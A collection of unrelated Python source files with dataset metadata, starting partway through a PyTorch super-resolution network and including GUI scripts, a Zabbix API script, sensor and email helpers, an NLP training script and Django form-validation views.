nn.Conv2d(in_channels=output_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n def forward(self, x):\n out = self.down(x)\n return out\n\n\nclass Up(nn.Module):\n def __init__(self, scale, input_feature, output_feature):\n super(Up, self).__init__()\n if scale == 2 :\n self.up = nn.Sequential(\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n if scale == 3:\n self.up = nn.Sequential(\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=output_feature, kernel_size=5, stride=3,\n padding=1, bias=True)\n )\n if scale == 4:\n self.up = nn.Sequential(\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=input_feature, kernel_size=4, stride=2,\n padding=1, bias=True),\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n def forward(self, x):\n out = self.up(x)\n return out\n\n\nclass Net(nn.Module):\n def __init__(self, opt):\n super(Net, self).__init__()\n\n inChannels = opt['in_channels']\n num_feature = opt['num_features']\n compress = opt['compress']\n num_blocks = int(opt['nBlock']/2)\n layers = opt['nDenselayer']\n self.scale = opt['scale']\n self.iteration = opt['iterations']\n\n self.conv_input = nn.Conv2d(in_channels=inChannels, 
out_channels=num_feature, kernel_size=3, stride=1, padding=1)\n        self.conv_output_list = nn.ModuleList([\n            nn.Conv2d(in_channels=num_feature, out_channels=inChannels, kernel_size=3, stride=1,\n                      padding=1) for _ in range(self.iteration)\n        ])\n\n        self.up_list = nn.ModuleList([\n            Up(self.scale, num_feature, num_feature) for _ in range(self.iteration)\n        ])\n\n        self.down_list = nn.ModuleList([\n            Down(self.scale, num_feature, num_feature) for _ in range(self.iteration-1)\n        ])\n\n        self.IRU_body_list = nn.ModuleList([\n            self._make_iru_body(num_feature, compress, layers, num_blocks) for _ in range(self.iteration)\n        ])\n\n        for m in self.modules():\n            if isinstance(m, nn.Conv2d):\n                nn.init.xavier_uniform_(m.weight.data)\n                if m.bias is not None:\n                    m.bias.data.zero_()\n\n    def _make_iru_body(self, num_feature, compress, layers, num_blocks):\n        return nn.Sequential(*[\n            blocks(num_feature, compress, layers) for _ in range(num_blocks)\n        ])\n\n    def forward(self, x):\n        # output-1\n        out = []\n        init_fe = self.conv_input(x)\n        high_fe = self.IRU_body_list[0](init_fe) + init_fe\n        up_fe = self.up_list[0](high_fe)\n        out.append(self.conv_output_list[0](up_fe))\n\n        # output-2 and later: iterative back-projection refinement\n        for idx in range(1, self.iteration):\n            down_fe = self.down_list[idx-1](up_fe)\n            res_fe = high_fe - down_fe\n            high_fe = self.IRU_body_list[idx](res_fe) + down_fe\n            up_fe = self.up_list[idx](high_fe)\n            out.append(self.conv_output_list[idx](up_fe) + out[idx-1])\n\n        return out\n\n        # down_fe = self.down1(up_fe)\n        # res_fe = high_fe-down_fe\n        # high_fe = self.IRU_body2(res_fe) + down_fe ## todo: down_fe or res_fe\n        # up_fe = self.up2(high_fe)\n        # out2 = self.conv_output2(up_fe)\n\n        # output-3\n        # res_fe = self.down2(nnn)\n        # out3 = out-res_fe\n        # out = self.Blocks3(out3) + res_fe\n        # nnn = self.up3(out)\n        # out3 = self.conv_output3(nnn)\n\n        # output-4\n        # res_fe = self.down3(nnn)\n        # out4 = out - res_fe\n        # out4 = self.Blocks4(out4) + res_fe\n        # out4 = self.r(out4)\n\n        # return (out1, out1+out2)\n\n\n# class myloss(nn.Module):\n#     def __init__(self):\n#         super(myloss, self).__init__()\n#         self.l1_loss = nn.L1Loss()\n#         self.cpl_loss = CPLoss()\n#\n#     def __call__(self, output, target):\n#         total_loss = self.l1_loss(output, target)\n#         total_loss += torch.mul(self.cpl_loss(output, target), 0.1)\n#         return total_loss\n\nclass myloss(nn.Module):\n    def __init__(self):\n        super(myloss, self).__init__()\n        self.l1 = nn.L1Loss()\n\n    def __call__(self, sr, gt):\n        # average the L1 loss over all intermediate outputs\n        total_loss = 0\n        for sr_tmp in sr:\n            total_loss += self.l1(sr_tmp, gt)\n        return total_loss / len(sr)","sub_path":"networks/EDenseUpDown.py","file_name":"EDenseUpDown.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
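A quick shape check for the network above; the opt values are assumptions chosen only so the channel arithmetic works (compress must stay below num_features):

```python
# Smoke test: two iterations -> two progressively refined 2x outputs.
import torch

opt = {'in_channels': 3, 'num_features': 64, 'compress': 32,
       'nBlock': 4, 'nDenselayer': 4, 'scale': 2, 'iterations': 2}
net = Net(opt)
outs = net(torch.randn(1, 3, 24, 24))
print([tuple(o.shape) for o in outs])  # [(1, 3, 48, 48), (1, 3, 48, 48)]
```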
+{"seq_id":"93731596","text":"# -*- coding: utf-8 -*-\n\n# convert the ui file to python, then import it (output name must match the import below)\nimport os\nos.system('pyuic5 -o form.py form.ui')\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nimport form\n\nclass MainWindow(QMainWindow):\n    \"\"\"the main user interface\"\"\"\n    def __init__(self, parent=None):\n        super(MainWindow, self).__init__(parent)\n        self.ui = form.Ui_MainWindow()\n        self.ui.setupUi(self)\n        self.data = {}\n        self.command = {}\n        self.notification = {}\n\n    def addNumber(self):\n        self.command[\"add\"]()\n        self.ui.string.setText(str(self.data[\"num\"]))\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
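The window above expects its host code to inject the data/command hooks before showing it; a hypothetical wiring sketch consistent with addNumber (nothing here is from the original file):

```python
# Hypothetical driver for MainWindow; the 'num'/'add' keys mirror addNumber above.
import sys

if __name__ == '__main__':
    app = QApplication(sys.argv)
    win = MainWindow()
    win.data['num'] = 0

    def add():
        win.data['num'] += 1

    win.command['add'] = add
    win.show()
    sys.exit(app.exec_())
```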
+{"seq_id":"39820488","text":"import sys\nimport os\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom PF import PF\nfrom Laser import Laser\nfrom Gridmap import Gridmap\n\n\nif __name__ == \"__main__\":\n\n # This function should be called with two arguments:\n # sys.argv[1]: Pickle file defining problem setup\n # sys.argv[2]: Number of particles (default=100)\n if len(sys.argv) == 3:\n numParticles = int(sys.argv[2])\n elif len(sys.argv) == 2:\n numParticles = 100\n else:\n print(\"usage: RunPF.py Data.pickle numParticles (optional, default=100)\")\n sys.exit(2)\n\n # Load data\n Data = pickle.load(open(sys.argv[1], \"rb\"), encoding=\"latin1\")\n deltat = Data[\"deltat\"] # [0,0]\n occupancy = Data[\"occupancy\"]\n # occupancy = np.array([[0,0,0],[0,0,0],[0,0,0]])\n U = Data[\"U\"]\n X0 = Data[\"X0\"]\n Ranges = Data[\"Ranges\"]\n XGT = Data[\"XGT\"]\n Alpha = Data[\"Alpha\"]\n sparsity = 5\n\n numBearings = Ranges[0, 0].shape[0]\n Ranges = np.array(Ranges.tolist())[:, :, ::sparsity]\n\n # Gridmap class\n gridmap = Gridmap(occupancy)\n\n # Laser class\n laser = Laser(numBearings, sparsity)\n\n # Instantiate the PF class\n pf = PF(numParticles, Alpha, laser, gridmap, visualize=True)\n\n filename = os.path.basename(sys.argv[1]).split(\".\")[0] + \"_Pn\" + str(numParticles)\n pf.run(U, Ranges, deltat, X0, XGT, filename)\n","sub_path":"robotics/ekf_slam_and_pf_localization/code/pf/RunPF.py","file_name":"RunPF.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"78442181","text":"#!/usr/bin/python\n#coding=utf-8\nfrom Tkinter import *\nimport tkFont\n\nwin = Tk()\n\nmyFont = tkFont.Font(family = 'Helvetica', size = 36, weight = 'bold')\n\n# ledButton is created by the window builders below; it must be a module-level\n# global so that ledON() can reach it\nledButton = None\n\ndef ledON():\n\tprint(\"LED button pressed\")\n\n\tif (ledButton[\"text\"] == \"LED ON\"):\n\t\tledButton[\"text\"] = \"LED OFF\"\n\telse:\n\t\tledButton[\"text\"] = \"LED ON\"\n\ndef exitProgram():\n\tprint(\"Exit Button pressed\")\n\twin.withdraw()\n\tmainwindowtoo()\n\t#win.quit()\n\ndef mainwindowtoo():\n\tglobal ledButton\n\twin.title(\"First GUI\")\n\twin.geometry('400x480')\n\n\tledButton = Button(win, text = \"LED ON\", font = myFont, command = ledON, height = 2, width = 8)\n\tledButton.pack()\n\ndef mainwindow():\n\tglobal ledButton\n\twin.title(\"First GUI\")\n\twin.geometry('800x480')\n\n\texitButton = Button(win, text = \"Exit\", font = myFont, command = exitProgram, height = 2, width = 6)\n\texitButton.pack(side = BOTTOM)\n\n\tledButton = Button(win, text = \"LED ON\", font = myFont, command = ledON, height = 2, width = 8)\n\tledButton.pack()\n\nmainwindow()\nmainloop()\n","sub_path":"environment/python/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"118620756","text":"# def square_numbers(nums):\n# result = []\n# for i in nums:\n# result.append(i * i)\n# return result\n\n# my_nums = square_numbers([1, 2, 3, 4, 5])\n\n# print (my_nums)\n\n\n\n# def square_numbers(nums):\n# for i in nums:\n# yield i * i\n\n# my_nums = square_numbers([1, 2, 3, 4, 5])\n\n# for num in my_nums:\n# print(num)\n\n\nfrom __future__ import division\nimport os\nimport psutil\nimport random\nimport time\n\nnames = ['1', '2', '3', '4', '5', '6']\nmajors = ['A', 'B', 'C', 'D', 'E']\n\nprocess = psutil.Process(os.getpid())\nmem_before = process.memory_info().rss / 1024 / 1024\n\n\ndef people_list(num_people):\n result = []\n for i in range(num_people):\n person = {\n 'id': i,\n 'name': random.choice(names),\n 'major': random.choice(majors)\n }\n result.append(person)\n return result\n\n\ndef people_generator(num_people):\n for i in range(num_people):\n person = {\n 'id': i,\n 'name': random.choice(names),\n 'major': random.choice(majors)\n }\n yield person\n\nt1 = time.clock()\n#people = people_list(1000000) \npeople = people_generator(1000000) \nt2 = time.clock()\nmem_after = process.memory_info().rss / 1024 / 1024\ntotal_time = t2 - t1\nfor p in people:\n print(p)\n\nprint ('Before MEM: {} MB'.format(mem_before))\nprint ('After MEM: {} MB'.format(mem_after))\nprint ('Total Sec: {:.6f} sec'.format(total_time))","sub_path":"generator (2).py","file_name":"generator (2).py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
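The time.clock() call used above was deprecated in Python 3.3 and removed in 3.8; on modern interpreters the same measurement reads more clearly with time.perf_counter():

```python
# Timing sketch for Python 3.8+: perf_counter replaces time.clock.
import time

t1 = time.perf_counter()
squares = (i * i for i in range(1000000))  # generator: created lazily, ~no memory
t2 = time.perf_counter()
print('Total Sec: {:.6f} sec'.format(t2 - t1))
```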
+{"seq_id":"399352940","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sys\nimport json\nimport time\nimport requests\nimport parame\nimport sys\nimport re\nfrom QuerySet import kwargs\n\nclass Api:\n def __init__(self):\n self.url = 'https://z.baidu.com/api_jsonrpc.php'\n self.headers = {'Content-Type': 'application/json'}\n auth = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": parame.zabbix_user,\n \"password\":parame.zabbix_pass\n },\n \"id\": 1,\n \"auth\":None,\n }\n response = requests.post(self.url,data=json.dumps(auth),headers=self.headers)\n self.authid = json.loads(response.text)['result'] ### auth的id\n\n def get_host(self,hosts): #数据库传递进来的主机参数\n data = parame.host_get\n data['auth'] = self.authid ###将返回id 写进去 接口会验证这个唯一\n if hosts: ### 判断是否为空 为空说明没有找到主机 直接退出 \n pass\n else:\n print(\"result not found\")\n sys.exit(10)\n for host in hosts:\n data['params']['filter']['host'].append(host) ###将主机加入参数里面\n response = requests.post(self.url,data=json.dumps(data),headers=self.headers)\n lists = json.loads(response.text)['result']\n result = [ lists[i]['hostid'] for i in range(len(lists)) ]\n return result ###返回主机hostsid \n\n def graph_get(self,res): ###请求主机图形结果\n hosts_id = self.get_host(res) ### 把hostsid 赋值给hosts_id \n data = parame.graph_get\n data['auth'] = self.authid\n for hosts in hosts_id:\n data['params']['hostids'].append(hosts)\n response = requests.post(self.url,data=json.dumps(data),headers=self.headers)\n graph_id = json.loads(response.text)['result']\n result = []\n for index in range(len(graph_id)):\n result.append(graph_id[index]['graphid'])\n return result\n\n def screen_add(self,graph_ids,screen_name): ###创建图形\n response = self.graph_get(graph_ids)\n x = 0 ### x为行 此处的定义 取决于parame.screen_add 里面的hsize 和vsize 最多为 hsize - 1 or vsize -1 \n y = 0 ### y为列 \n parame.screen_add['params']['name'] = screen_name\n parame.screen_add['auth'] = self.authid\n for value in response:\n parame.screen_add['params']['screenitems'].append({\n \"resourcetype\": 0,\n \"resourceid\": value,\n \"width\": \"500\", ###宽高度\n \"height\": \"100\",\n \"rowspan\": 1,\n \"colspan\": 1,\n \"x\": x,\n \"y\": y\n })\n if x == 1: ###此处判断 我们需求只需要两行一列 等于1 x为0 \n x = 0\n y += 1\n else:\n x += 1\n time.sleep(0.01)\n response = requests.post(self.url,data=json.dumps(parame.screen_add),headers=self.headers)\n\nif __name__ == '__main__':\n try:\n func = Api()\n res = kwargs(\"%\" + str(sys.argv[4]) + \"%\") ###数据库传递的参数\n func.screen_add(res,str(sys.argv[2])) ### 聚合图形群组名\n\n except Exception as e:\n print(e)\n print('--name 聚合图形组名 --hostname 匹配加入的主机')\n sys.exit(1)\n","sub_path":"screen_api.py","file_name":"screen_api.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"600752522","text":"from PyQt5.QtCore import QObject, pyqtSignal\nfrom INTERACTION1.DRIVER.Interaction.PumpsStation.Liquid._OneSensor import OneSensor\n\nLIQUID_TYPE = {0: 'WATER', 1: 'ALKALI', 2: 'ACID', 3: 'WHEEL', 4: 'WAX'}\n\n\nclass Liquid(QObject):\n\n sign_data = pyqtSignal(dict) # liquid_data\n\n def __init__(self, pi, rx_pins, tx_pins):\n super().__init__()\n # LIQUID\n self._liquid = dict()\n self._liquid_data = {'WATER': None, 'ALKALI': None, 'ACID': None, 'WHEEL': None, 'WAX': None}\n for sid, rx_pin in enumerate(rx_pins):\n self._liquid[LIQUID_TYPE[sid]] = OneSensor(pi=pi, sid=sid, rx_pin=rx_pin, tx_pin=tx_pins[sid], data_cb=self._data)\n\n def _data(self, sid, data):\n self._liquid_data[LIQUID_TYPE[sid]] = data\n if None not in self._liquid_data.values():\n print(self._liquid_data.copy())\n self.sign_data.emit(self._liquid_data.copy())\n for LIQUID_TYPE[sid] in self._liquid_data.keys():\n self._liquid_data[LIQUID_TYPE[sid]] = None\n\n\nif __name__ == '__main__':\n import os\n import pigpio\n\n _pi = pigpio.pi()\n if not _pi.connected:\n os.system('sudo pigpiod')\n _pi = pigpio.pi()\n\n liquid = Liquid(pi=_pi, rx_pins=[15, 24, 8, 12, 20], tx_pins=[14, 23, 25, 7, 16])\n liquid.sign_data.connect(lambda x: print(x))\n","sub_path":"INTERACTION1/DRIVER/Interaction/PumpsStation/Liquid/Liquid.py","file_name":"Liquid.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"137043831","text":"# -*- coding: utf-8 -*-\n\nfrom decimal import Decimal\nfrom flask import render_template\nfrom flask.ext.mail import Message\nfrom html2text import html2text\nfrom premailer import transform as email_transform\nfrom .models import Order, LineItem, LINE_ITEM_STATUS, CURRENCY_SYMBOL\nfrom . import mail, app\n\n\ndef send_receipt_email(order_id, subject=\"Thank you for your order!\"):\n \"\"\"\n Sends an link to fill attendee details and cash receipt to the order's buyer\n \"\"\"\n with app.test_request_context():\n order = Order.query.get(order_id)\n msg = Message(subject=subject, recipients=[order.buyer_email], bcc=[order.organization.contact_email])\n line_items = LineItem.query.filter(LineItem.order == order, LineItem.status == LINE_ITEM_STATUS.CONFIRMED).order_by(\"line_item_seq asc\").all()\n html = email_transform(render_template('attendee_assigment.html', order=order, org=order.organization, line_items=line_items, base_url=app.config['BASE_URL']))\n msg.html = html\n msg.body = html2text(html)\n mail.send(msg)\n\n\ndef send_participant_assignment_mail(order_id, item_collection_title, team_member, subject=\"Please tell us who's coming!\"):\n with app.test_request_context():\n order = Order.query.get(order_id)\n msg = Message(subject=subject, recipients=[order.buyer_email], bcc=[order.organization.contact_email])\n html = email_transform(render_template('participant_assignment_mail.html', base_url=app.config['BASE_URL'], order=order, org=order.organization, item_collection_title=item_collection_title, team_member=team_member))\n msg.html = html\n msg.body = html2text(html)\n mail.send(msg)\n\n\ndef send_line_item_cancellation_mail(line_item_id, subject=\"Ticket Cancellation\"):\n with app.test_request_context():\n line_item = LineItem.query.get(line_item_id)\n item_title = line_item.item.title\n order = line_item.order\n is_paid = line_item.final_amount > Decimal('0')\n msg = Message(subject=subject, recipients=[order.buyer_email], bcc=[order.organization.contact_email])\n # Only INR is supported as of now\n html = email_transform(render_template('line_item_cancellation_mail.html',\n base_url=app.config['BASE_URL'],\n order=order, line_item=line_item, item_title=item_title, org=order.organization, is_paid=is_paid,\n currency_symbol=CURRENCY_SYMBOL['INR']))\n msg.html = html\n msg.body = html2text(html)\n mail.send(msg)\n","sub_path":"boxoffice/mailclient.py","file_name":"mailclient.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"320327129","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelEncoder\nfrom argparse import ArgumentParser\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nimport torch\nimport tqdm\nfrom torch import nn\nfrom torch.utils import data\nimport pickle\nimport numpy as np\nimport gensim\nimport logging\nimport zipfile\nimport json\nimport random\nimport time\n\nimport torch.nn.functional as F\nfrom loader import TSVDataset\nfrom models import Classifier\nfrom torch.utils.data import DataLoader\n\ndef load_embedding(modelfile):\n # Binary word2vec format:\n if modelfile.endswith(\".bin.gz\") or modelfile.endswith(\".bin\"):\n emb_model = gensim.models.KeyedVectors.load_word2vec_format(\n modelfile, binary=True, unicode_errors=\"replace\"\n )\n # Text word2vec format:\n elif (\n modelfile.endswith(\".txt.gz\")\n or modelfile.endswith(\".txt\")\n or modelfile.endswith(\".vec.gz\")\n or modelfile.endswith(\".vec\")\n ):\n emb_model = gensim.models.KeyedVectors.load_word2vec_format(\n modelfile, binary=False, unicode_errors=\"replace\"\n )\n # ZIP archive from the NLPL vector repository:\n elif modelfile.endswith(\".zip\"):\n with zipfile.ZipFile(modelfile, \"r\") as archive:\n # Loading and showing the metadata of the model:\n metafile = archive.open(\"meta.json\")\n metadata = json.loads(metafile.read())\n for key in metadata:\n print(key, metadata[key])\n print(\"============\")\n # Loading the model itself:\n stream = archive.open(\n \"model.bin\" # or model.txt, if you want to look at the model\n )\n emb_model = gensim.models.KeyedVectors.load_word2vec_format(\n stream, binary=True, unicode_errors=\"replace\"\n )\n else: # Native Gensim format?\n emb_model = gensim.models.KeyedVectors.load(modelfile)\n # If you intend to train the model further:\n # emb_model = gensim.models.Word2Vec.load(embeddings_file)\n # Unit-normalizing the vectors (if they aren't already):\n emb_model.init_sims(\n replace=True\n )\n return emb_model\n\ndef evaluate(model, data, labels=None):\n #evalutate the model, returns scores\n gold, predictions = [], []\n for n, (input_data, gold_label) in enumerate(data):\n out = model(input_data)\n predicted = out.argmax(axis=1)\n gold.extend(gold_label.tolist())\n predictions.extend(predicted.tolist())\n\n if labels:\n print(metrics.classification_report(gold, predictions, target_names=labels))\n\n return metrics.accuracy_score(gold, predictions)\n #return metrics.f1_score(gold, predictions, average='macro')\n\nif __name__ == \"__main__\":\n\n parser = ArgumentParser()\n parser.add_argument(\"--path\", default=\"stanford_sentiment_binary.tsv.gz\")\n parser.add_argument(\"--save\", default=\"test\")\n parser.add_argument(\"--vocab_size\", action=\"store\", type=int, default=2000)\n parser.add_argument(\"--hidden_dim\", action=\"store\", type=int, default=128)\n parser.add_argument(\"--batch_size\", action=\"store\", type=int, default=32)\n parser.add_argument(\"--lr\", action=\"store\", type=float, default=1e-3)\n parser.add_argument(\"--epochs\", action=\"store\", type=int, default=15)\n parser.add_argument(\"--split\", action=\"store\", type=float, default=0.8)\n\n parser.add_argument(\"--embeddings\", action=\"store\", default=\"40.zip\")\n\n args = parser.parse_args()\n\n #setting a seed for reproducibility\n torch.manual_seed(42)\n\n print(\"Loading the 
embeddings...\\n\")\n\n embeddings_model = load_embedding(args.embeddings)\n args.vocab_size = len(embeddings_model.wv.vocab)\n\n embeddings_model.add('', weights=torch.zeros(embeddings_model.vector_size))\n\n print(\"Loading the dataset...\\n\")\n \n df = pd.read_csv(args.path, sep='\\t', header=0, compression='gzip')\n df = df[df.label != 'label']\n\n #split the dataset in train and val with a given split given from args, defalut=0.2\n train_df, val_df = train_test_split(df, train_size=args.split)\n train_dataset = TSVDataset(args, train_df, embeddings_model=embeddings_model)\n val_dataset = TSVDataset(args, val_df, vocab=train_dataset.vocab, embeddings_model=train_dataset.embeddings)\n\n print(train_dataset.indexers['label'])\n\n model = Classifier(args, train_dataset.num_labels, embeddings_model)\n criterion = nn.CrossEntropyLoss()\n optimiser = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n val_labels = []\n val_predictions = []\n\n def pad_batches(batch, pad_idx):\n #padding the batches\n longest_sentence = max([X.size(0) for X, y in batch])\n\n new_X = torch.stack([F.pad(X, (0, longest_sentence - X.size(0)), value=pad_idx) for X, y in batch])\n new_y = torch.stack([y for X, y in batch])\n\n return new_X, new_y\n\n pad_idx = embeddings_model.vocab[''].index\n batch_size = 16\n loader = DataLoader(dataset=train_dataset, batch_size=batch_size, collate_fn=lambda x: pad_batches(x, pad_idx))\n\n #training, looping over all the batches\n for epoch in range(args.epochs):\n model.train()\n for i, batch in enumerate(tqdm.tqdm(loader)):\n text = batch[0]\n label = batch[1]\n for n in range(len(text)):\n optimiser.zero_grad()\n y_pred = model(text[n])\n loss = criterion(y_pred, label[n])\n loss.backward()\n optimiser.step()\n\n #evaluation\n model.eval()\n train_f1 = evaluate(model, train_dataset)\n val_f1 = evaluate(model, val_dataset)\n\n print(f\"epoch: {epoch}\\tloss: {loss.item():.3f}\\tAccuracy: {train_f1:.3f}\")\n print(f\"Validation Accuracy: {val_f1:.3f}\")\n\n #save the model as a pickle\n torch.save({'model': model.state_dict(),\n 'training_args': args}, f\"{args.save}_model.pt\")","sub_path":"obligatory2/2/oblig2_train_model_with_dataloader.py","file_name":"oblig2_train_model_with_dataloader.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"52843868","text":"# coding:UTF-8\n\nfrom PIL import Image\n\nim = Image.open('test.jpg') # open the picture\nend_name = im.format # 得到后缀\n(width, height) = im.size\n# 初始化left,upper,right,lower\ncount = 1\nfor i in range(3): # 行\n for j in range(3): # 列\n upper = int(i*(1/3)*height)\n lower = int((i+1)*(1/3)*height)\n left = int(j*(1/3)*width)\n right = int((j+1)*(1/3)*width)\n newIm = Image.new('RGBA', (int(1/3*width), int(1/3*height)), (0, 0, 0))\n new_im = im.crop((left,upper,right,lower))\n newsize_width,newsize_height = new_im.size\n newIm.paste(new_im, (0,0,newsize_width,newsize_height))\n new_name = str(count)+'.'+end_name\n newIm.save(new_name,end_name)\n count += 1\nim.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"579104355","text":"# Brian Cheng\n# Eric Liu\n# Brent Min\n\n# views.py contains the logic needed to do form validation and render the various webpages of\n# the heroku app\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.validators import URLValidator\n\nfrom .forms import RecInputForm\n\nimport os\n\nimport sys\nsys.path.append('../../..')\n\ndef about(request):\n return render(request, \"about.html\")\n\ndef developers(request):\n return render(request, \"developers.html\")\n\ndef algorithims(request):\n return render(request, \"algorithims.html\")\n\ndef template(form=None, notes=\"\", latitude=33.8734, longitude=-115.9010, results=[]):\n \"\"\"\n A nice way to update all template inputs to the render functions all at once.\n\n :param: form The current contents of the main form. This input allows the site to\n remember what the user has previously entered\n :param: notes Various notes to display to the user. Commonly used for debug messages\n and reporting errors from form validation\n :param: latitude The latitude to display on the map. Default is at JTree\n :param: longitude The longitude to display on the map. Default is at JTree\n :param: results A list containing the recommendations. This is formatted by django\n templates\n\n :return: dict A dictionary as shown below \n \"\"\"\n template_default = {\n \"form\": form,\n \"notes\": notes,\n \"latitude\": latitude,\n \"longitude\": longitude,\n \"results\": results,\n \"google_maps_api_key\": os.getenv(\"GOOGLE_MAPS_API_KEY\")\n }\n\n return template_default\n\ndef bootstrap4_index(request):\n # enter if the button is pressed on the website\n if(request.method == \"POST\"):\n\n form = RecInputForm(request.POST)\n\n if(form.is_valid()):\n\n # run the secondary validation code\n inputs = secondary_validation(form)\n\n # if there are errors, then the bool flag would be true\n if(inputs[1]):\n return render(request, 'index.html', template(form, inputs[1], \n inputs[0][\"location\"][0], inputs[0][\"location\"][1]))\n\n # run the main code\n from run import main\n results = main(inputs[0])\n\n # # transform the return dictionary into the proper format for django templates\n # trans_results = format_django(results)\n\n # return the value of the main code\n return render(request, 'index.html', template(form, results[\"notes\"], \n inputs[0][\"location\"][0], inputs[0][\"location\"][1], results[\"recommendations\"]))\n\n return render(request, 'index.html', template(form))\n\n # note on opening the website, set the initial recommender to be top_pop\n form = RecInputForm(initial={\"rec\": \"top_pop\"})\n return render(request, 'index.html', template(form))\n\ndef secondary_validation(form): \n \"\"\"\n This function runs some secondary validation code that I could not integrate into django\n without it messing up the website style\n\n :param: form The form containing cleaned data\n\n :return: (dict, str) The dict contains the input to the main function, and the string \n contains the error message (can be \"\")\n \"\"\"\n # store error string here if necessary\n errors = []\n\n # get the url\n url = form.cleaned_data[\"url\"]\n\n # if top popular recommender is chosen, don't enter and don't validate url\n if not (form.cleaned_data[\"rec\"][0]==\"top_pop\" or form.cleaned_data[\"rec\"][0]==\"debug\"):\n if url == '':\n errors.append(f\"Must input a Mountain Project user URL\")\n else:\n # validate the url structure\n validator = URLValidator()\n try:\n validator(url)\n except 
ValidationError:\n errors.append(f\"Mountain Project URL ({url}) is not a valid user page.\")\n\n # validate that the url contains both \"mountainproject.com\" and \"user\"\n if((len(errors) == 0) and ((\"mountainproject.com\" not in url) or (\"user\" not in url))):\n errors.append(f\"Mountain Project URL ({url}) is not a valid user page.\")\n\n # get the boulder grades\n if(form.cleaned_data[\"get_boulder\"]):\n bl = int(form.cleaned_data[\"boulder_lower\"])\n bu = int(form.cleaned_data[\"boulder_upper\"])\n\n # validate the boulder grades if the box is checked\n if(bl > bu):\n error_str = f\"Lowest Boulder Grade (V{bl}) should be less than or equal to Highest \" \\\n f\"Boulder Grade (V{bu}).\"\n errors.append(error_str)\n # if the user did not want boulders\n else:\n bl = -1\n bu = -1\n\n # get the route grades\n if(form.cleaned_data[\"get_route\"]):\n rl = route_to_int(form.cleaned_data[\"route_lower\"])\n ru = route_to_int(form.cleaned_data[\"route_upper\"])\n\n # validate the route grades\n if(rl is None):\n error_str = f\"Lowest Route Grade (5.{form.cleaned_data['route_lower']}) is an \" \\\n \"invalid difficulty.\"\n errors.append(error_str)\n if(ru is None):\n error_str = f\"Highest Route Grade (5.{form.cleaned_data['route_upper']}) is an \" \\\n \"invalid difficulty.\\n\"\n errors.append(error_str)\n if((rl is not None) and (ru is not None)):\n if(rl > ru):\n error_str = f\"Lowest Route Grade (5.{form.cleaned_data['route_lower']}) should \" \\\n \"be less than or equal to Highest Route Grade \" \\\n f\"(5.{form.cleaned_data['route_upper']}).\\n\"\n errors.append(error_str)\n # if the user did not want routes\n else: \n rl = -1\n ru = -1\n\n # make sure that the user selected at least one of boulder/route\n if(bl == -1 and rl == -1):\n errors.append(\"One of Boulder or Route must be checked.\\n\")\n\n # create the config dictionary to pass into main\n inputs = {\n \"user_url\": form.cleaned_data[\"url\"],\n \"location\": [form.cleaned_data[\"latitude\"], form.cleaned_data[\"longitude\"]],\n \"max_distance\": form.cleaned_data[\"max_distance\"],\n \"recommender\": form.cleaned_data[\"rec\"][0], # note for some reason [\"rec\"] is a list\n \"num_recs\": form.cleaned_data[\"num_recs\"],\n \"difficulty_range\": {\n \"boulder\": [bl, bu],\n \"route\": [rl, ru]\n }\n }\n return (inputs, errors)\n\ndef route_to_int(route_str):\n \"\"\"\n This function takes a route string and turns it into an integer\n\n :param: route_str The stuff after the \"5.\". 
